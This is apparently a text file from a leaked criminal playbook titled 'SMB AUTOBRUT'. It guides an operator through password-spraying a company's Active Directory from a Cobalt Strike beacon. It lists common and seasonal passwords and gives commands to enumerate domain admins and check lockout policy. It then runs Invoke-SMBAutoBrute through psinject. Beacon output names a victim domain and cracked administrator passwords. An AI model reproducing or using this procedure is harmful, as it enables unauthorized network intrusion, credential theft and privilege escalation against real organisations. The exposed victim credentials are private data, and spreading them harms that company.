-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathSMB AUTOBRUT.txt
114 lines (79 loc) · 4.58 KB
/
SMB AUTOBRUT.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
``MB AUTOBRUT
The inputs to this attack are just passwords.
- Those which were compiled from CharpChrome browser
- Those which were compiled by SeatBeltom
- Those of the passwords obtained via network activity (mimicatts, etc.)
And in general any others, such as those found in the files.
If there are less passwords of the kind than we can launch a bruteforce attack on a company, we can easily add them from the following list of the most common passwords in a corporate environment.
Password1
Hello123
password
welcome1
banco@1
training
Password123
job12345
spring
food1234
We also recommend using password lists based on seasons and current year. Given that passwords change every three months - you can take a "reserve" for generating such a list.
For example, in August 2020, we create the following list
June2020
July2020
August2020
August2020
Summer20
Summer2020
June2020!
July2020!
August2020!
August2020!
Summer2020!
Summer2020!
All of the passwords above fall into either 3 of the 4 Active Directory password requirements (which is enough for users to set them), or all 4 requirements.
Note: we are considering the most popular version of the requirements.
Scenario with domain administrators
1. Gather a list of domain admins by issuing shell net group "domain admins" /dom command
Write all the obtained data into the
admins.txt
2. Upload this file to host folder C:\ProgramData
3. Request information about domain account blocking policy (protection against bruteforce)
beacon> shell net accounts /dom
Tasked beacon to run: net accounts /dom
host called home, sent: 48 bytes
received output:
The request will be processed at a domain controller for domain shookconstruction.com.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 6
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP
We are interested in the Lockout threshold parameter which often contains a numeric value which we will later use as a parameter (in this case it is 'Never' which means that the anti-password protection is disabled.
In this guide we will use the value 5 as a rough guide to the most common.
Minimum password length parameter specifies the minimum allowed number of characters of the password, it is required for filtering our password list.
4. In the script source code we specify the domain where the script will run
- string $context = new-object System.DirectoryServices.ActiveDirectory.DirectoryContext("Domain", "shookconstruction.com")
5. Import and run the script
powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1
psinject 4728 x86 Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
- 4728 is the current pid in this case, and x86 is its bit size
- The list of passwords consists of one which we have "found" and two from the list of popular passwords
6. Watch the script progress and see the result
Success! Username: Administrator. Password: 1qazXDR%+
Success! Username: CiscoDirSvcs. Password: 1qazXDR%+
We've taken down two domain admins.
========================================================================
The script without specifying a list of users differs in only two things.
- psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5
We don't specify parameters UserList and ShowVerbose. The absence of the first means that the search will be conducted on ALL users in the domain, the absence of the second indicates that the output will be only successful results.
I will not wait in the video guide for the script, which will search all user / password pairs in the domain, I will only show the output.
Success! Username: Administrator. Password: 1qazXDR%+.
Success! Username: CiscoDirSvcs. Password: 1qazXDR%+.
Success! Username: support. Password: 1qazXDR%+.
Success! Username: accountdept. Password: 1qazXDR%+
As you can see we were able to find accounts of other users, which can be useful for further promotion on the network and raising permissions.
If there is no positive result, you can try again after a while (optimal to multiply the Lockout duration parameter by two before the next attempt) with a new password list.
The end of the script will be indicated by a message in the beacon